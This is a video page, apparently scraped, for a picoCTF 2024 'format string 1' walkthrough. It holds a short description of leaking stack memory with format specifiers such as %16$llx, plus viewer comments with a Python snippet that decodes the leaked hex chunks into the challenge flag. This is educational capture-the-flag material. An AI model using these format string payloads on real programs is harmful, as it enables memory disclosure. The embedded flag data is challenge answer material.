pico2024 format string 1

Показать описание

The format string vulnerability allows us to walk up the stack and view its contents. Since this is a 64-bit executable, we need to use %llx to view the 64-bit numbers in hexadecimal. Using %16$llx allows us to walk 16 spaces up the stack. We then need to reverse the endianness to get the flag string (since the Intel architecture is little endian, and converting hex to ascii).

Martin Carlisle

Рекомендации по теме

Комментарии

Thank you very much for this. I'm a beginner on these concepts and it's very helpful to have an experienced demonstration to follow along with.

clancycunningham

the way to find a solution with a good idea. GG Sir!

SamuelVolder

No proper explanation sir, first IDK why all this doing, why and use?

ROBINHOOD-yx

Nice vid. %14$lx and %14$p both do the job in 64bit too. A couple of lines of python saves a lot of hassle with 64bit chunks:
chunks_64 = ['7b4654436f636970', '355f31346d316e34', '3478345f33317937', '31655f673431665f', '7d383130386531']
flag = ''
for chunk in chunks_64:
decoded_chunk = ''
for i in range(0, len(chunk), 2):
c = chr(int(chunk[i]+chunk[i+1], 16))
decoded_chunk+=c
flag+=decoded_chunk[::-1]
print(flag)

robertdreyfus

pico2024 format string 1

pico2024 format string 1

format string 1 | Binary Exploitation | picoCTF 2024

picoCTF 2024 Challenge Series - Beginner's Cybersecurity - Format String 0

FORMAT STRINGS (PicoCTF 2024 #7: Format String 0)

[WRITEUP] picoCTF (2024) - format-string-1

Format String printf Vulnerabilities (PicoCTF 2022 #46 'flag-leak')

A simple Format String exploit example - bin 0x11

pico2024 format string 3

pico2024 CanYouSee

pico2024 binhexa

pico2024 binary search

Format String Exploit Troubleshooting Over Twitter - bin 0x11 b

Understanding Format String Vulnerability || Binary Exploitation - 0x11

pico2024 heap 2

pico2024 heap 3

#5 - Lỗi format string - stringzz (picoCTF 2019)